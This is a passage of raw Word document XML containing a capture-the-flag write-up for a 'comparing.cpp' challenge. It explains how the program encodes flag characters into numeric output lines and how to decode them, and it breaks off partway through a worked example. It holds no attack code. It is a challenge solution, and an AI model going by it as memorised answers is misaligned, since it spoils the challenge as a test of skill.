    <w:p w14:paraId="6B3B930C" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="779FE087" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="79617699" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="190F4413" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="700994C2" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="29DF9142" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="6DED9E4C" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="2E19CE7F" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="1D921C87" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="2E776084" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:lastRenderedPageBreak/>
        <w:t>Step-by-Step Write-Up — “comparing.cpp”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BE683E" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>0) Challenge Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B1E686" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>comparing.cpp – hides a flag string, transforms it, and prints numeric lines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE5478B" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>output.txt – the numeric lines produced by the program (given to us).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF6876C" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00000000" w:rsidP="00FE5FE2">
      <w:r>
        <w:pict w14:anchorId="77BDD922">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B6119A" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>1) What the program does (bird’s-eye view)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCE12D7" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Split the hidden flag into pairs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:br/>
        <w:t>pair i is (flag[2*i], flag[2*i+1], i).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB5B066" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Push all pairs into a max-heap (priority_queue) ordered by int(c0) + int(c1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D2147" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Repeatedly pop two tuples t1=(val</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>1,val2,i</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>1) and t2=(val</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>3,val4,i</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>2), then print two lines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18329409" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Line for i1 uses (val1, val3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6765DEAE" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Line for i2 uses (val2, val4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1CA901" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Whether the line is even or odd depends on the tuple’s index (i1 or i2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C6580" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>even(i) → even(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>valA,valB</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>,i)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:br/>
        <w:t>str(valA)+str(valB)+str(i)+reverse(str(valA)+str(valB))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1ECD0B" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>odd(i) → odd(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>valA,valB</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>,i)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:br/>
        <w:t>str(valA)+str(valB)+str(i) (the “addend” sums to zero)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AD0E44" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve"> each iteration prints two lines that together encode four ASCII codes: (val</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>1,val</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>2) for i1 and (val</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>3,val</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>4) for i2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5709166D" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00000000" w:rsidP="00FE5FE2">
      <w:r>
        <w:pict w14:anchorId="493FF3EC">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AE37A1" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>2) Decoding rules (what each printed line looks like)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4098E1C5" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Odd line (for odd index i):</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:br/>
        <w:t>ABi</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:br/>
        <w:t>where AB is two ASCII codes concatenated, and the final digits are the index i. There is no mirrored tail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441A2AF1" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Even line (for even index i):</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:br/>
        <w:t xml:space="preserve">AB i </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>reverse(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>AB)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:br/>
        <w:t xml:space="preserve">i.e., a mirror/palindrome around the index. If you remove the trailing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>reverse(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>AB), the remaining middle ends with i, and the prefix is exactly AB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEE3A5D" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Here A and B are decimal ASCII codes of printable characters (32–126). AB typically is 4–6 digits total (because each of A/B is 2–3 digits).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6041E151" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00000000" w:rsidP="00FE5FE2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="357D8744">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6DD0F7" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>3) How to identify line type + extract (i, A, B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F68D30" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Goal: from a line, get the tuple (index i, code A, code B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A935523" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>A. If it’s even:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7135EC5D" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>A valid even line can be recognized by trying all positions of i (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>0..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>15 in this challenge) inside the string and checking for the mirrored tail:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB9A505" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>For each candidate i inside the string:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:br/>
        <w:t>split line = head + str(i) + tail.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:br/>
        <w:t xml:space="preserve">If tail == reverse(head) and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>head !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>= "", then it’s even with AB = head.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FC86C3" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>B. If it’s odd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACAA76D" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Check if the line ends with some i (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>0..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>15).</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:br/>
        <w:t>If yes, AB = line_without_the_trailing_i.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B85F077" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>C. Split AB into two ASCII codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C66E657" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Try the two plausible splits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529F5AAA" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">A = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>int(AB[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">:2]), B = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>int(AB[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>2:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46661B67" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">A = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>int(AB[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">:3]), B = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>int(AB[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>3:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56360A9E" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Pick the split where both A and B are in [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>32..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>126].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7242452F" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00000000" w:rsidP="00FE5FE2">
      <w:r>
        <w:pict w14:anchorId="2BBB1013">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73650A97" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>4) Pairing lines to reconstruct characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06544011" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>The program prints lines in pairs per heap iteration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A6D5E" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>First line (k) was for index i1, and carries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB29AE6" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>first char of i1 → val1 = A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DED24AD" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>first char of i2 → val3 = B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA4C062" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Second line (k+1) was for index i2, and carries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34757101" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>second char of i1 → val2 = C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187D0184" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>second char of i2 → val4 = D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAFE9BE" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Therefore, from lines (k, k+1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA6C7C3" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>pair[i1] = (val1, val2) = (A, C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524A3DFC" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>pair[i2] = (val3, val4) = (B, D)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0538C497" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:lastRenderedPageBreak/>
        <w:t>Repeat for (0,1), (2,3), ….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDA98BD" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">Finally, order </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>pair[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">0], </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>pair[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>1], … pair[N-1] and convert ASCII codes to characters to get the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76227A3A" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00000000" w:rsidP="00FE5FE2">
      <w:r>
        <w:pict w14:anchorId="4264709C">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B7EEBF" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>5) Manual example with the first two lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624EC99C" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Given the first two lines of output.txt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039956AB" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>0: 9548128459</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9E8E4D" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>1: 491095</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C5F1F1" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Line 0 → detect even</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DF9FD1" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Try i=12:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:br/>
        <w:t xml:space="preserve">"9548" + "12" + "8459" and "8459" == </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>reverse(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">"9548") </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:br/>
        <w:t>So it</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5FE2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
